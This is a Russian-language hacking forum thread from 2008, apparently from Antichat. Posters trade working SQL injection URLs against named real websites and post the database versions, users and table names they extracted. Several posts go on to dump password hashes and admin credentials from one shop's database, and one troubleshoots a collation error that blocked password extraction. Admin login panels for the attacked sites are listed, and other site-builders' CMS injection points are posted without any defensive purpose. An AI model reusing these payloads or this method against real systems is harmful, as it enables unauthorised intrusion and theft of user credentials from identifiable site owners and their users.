Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.10.2008, 16:52
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
Magazine
Код:
http://online-market.com.ua/stat_info.php?id=99999+union+select+1,version(),3,4/*
version: 5.0.41-community-log
user: onlinem_user@localhost
database: onlinem_base
Код:
http://www.fangoria.com/fearful_feature.php?id=99999'+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/*
version: 5.0.22
user: fango_site@localhost
database: joesena_fangoria
Онлайн аукционы
Код:
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,version(),4,5,6,7/*
version: 5.0.45-log
user: u72447@10.10.153.176
database: u72447
Код:
http://www.elcom.md/news.php?id=99999+union+select+1,2,version(),4,5,6,7/*
version: 5.0.27
user: 17325@localhost
database: 17325
|
|
|
26.10.2008, 16:57
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
тИЦ = 750
Код:
http://rezonans.info/index.php?p=news&nID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
version() - 5.0.45
database() - admin_smi
user() - admin_smi@localhost
--------------------------------------------
тИЦ = 230
Код:
http://www.womanineurope.com/beauty/show_fashion.php?cat=news&fnr=-1+union+select+1,version(),user(),4,5,database(),7/*
version() - 4.0.27-max-log
database() - db125240836
user() - dbo125240836@212.227.118.27
--------------------------------------------
Код:
http://www.michiganbusiness.us/showcompany.php?id=-1%0Aunion%0Aselect%0A1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
version() - 4.0.27-standard
user() - michigan_michiga@localhost
database() - michigan_mbusiness
Последний раз редактировалось bons; 26.10.2008 в 16:59..
|
|
|
|
26.10.2008, 17:37
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216
Репутация:
150
|
|
Код:
http://www.grably.ru/restaurants?id=9999+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,0,1,2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES--
Код:
http://www.specialradio.ru/mkz/?id=-1+union+select+1,version(),3,user(),5,6,7,8,9--
|
|
|
|
26.10.2008, 18:25
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
Цитрус
Компания по разработке сайтов. Уязвимость в их CMS.
Пример:
http://www.citrus-soft.ru/chapter.php?id_chapter=76'&from=m
Панель администратора:
http://www.citrus-soft.ru/admin/login.php
КирИТас
Компания по разработке сайтов.Уязвимость в CMS на сайте.
Пример:
http://www.ciritas.ru/product.php?id=15'
Панель администратора:
http://www.ciritas.ru/admin/login.php
Последний раз редактировалось $p01nt; 26.10.2008 в 19:18..
|
|
|
|
26.10.2008, 18:26
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527
Репутация:
62
|
|
У меня такая проблема - когда ввожу такую строку
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,passwor d,4,5,6,7+from+members
выдаёт вот такую ошибку - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation 'UNION'
ОДнако на такой запрос
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,id,4,5, 6,7+from+members - реагирует нормально. может быть кто-нибудь знает как эту фигню обойти??
|
|
|
|
26.10.2008, 19:02
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527
Репутация:
62
|
|
проблему решил!гугл помог. Если кому интересно , составил такой запрос
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,convert (password+using+cp1251),4,5,6,7+from+members на что получил хэши пользователей)
|
|
|
|
26.10.2008, 22:12
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
foopi
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(concat_ws(0x3a,table_name,table_schema))),4,5,6 ,7+from+information_schema.columns+where+column_na me+like+char(112,97,115,%20115,119,111,114,100)+li mit+7,1
tables with passwords
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,3,unhex (hex(password)),5,6,7+from+u72447_maillist.phplist _admin+limit+0,1
http://bestwayusa.ru/maillist/admin/?page=configure
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(concat_ws(0x3a,name,password))),4,5,6,7+from+u7 2447_2.chat_admin+limit+0,1
http://bestwayusa.ru/chatlive/admin
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(username)),unhex(hex(password)),5,6,7+from+deal ers+limit+0,1
http://bestwayusa.ru/dealer_login.php
http://bestwayusa.ru/admin.php
didnt find password in db
Последний раз редактировалось sabe; 26.10.2008 в 22:29..
|
|
|
|
27.10.2008, 01:15
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527
Репутация:
62
|
|
Сообщение от sabe
foopi
tables with passwords
http://bestwayusa.ru/maillist/admin/?page=configure
http://bestwayusa.ru/chatlive/admin
http://bestwayusa.ru/dealer_login.php
http://bestwayusa.ru/admin.php
didnt find password in db
Только я одного не могу понять ты эти ссылки сам находиш или через скулю узнаёшь??
|
|
|
|
27.10.2008, 02:18
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
foopi
сам) что там находить то ? по сайту 5 мин полазить ?
|
|
|
|
27.10.2008, 05:52
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216
Репутация:
150
|
|
Код:
http://www.sil.org/silepubs/abstract.asp?id=1%27+or+1=@@VERSION--
таблицы:
Код:
'dtproperties','bibliography','CountriesList','Country_Index','Language_Index','LanguagesList','name_index','Serials_Index','Serials_List','SIL_Epubs','subject_code_categories','Subject_index','sysconstraints','syssegments'
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
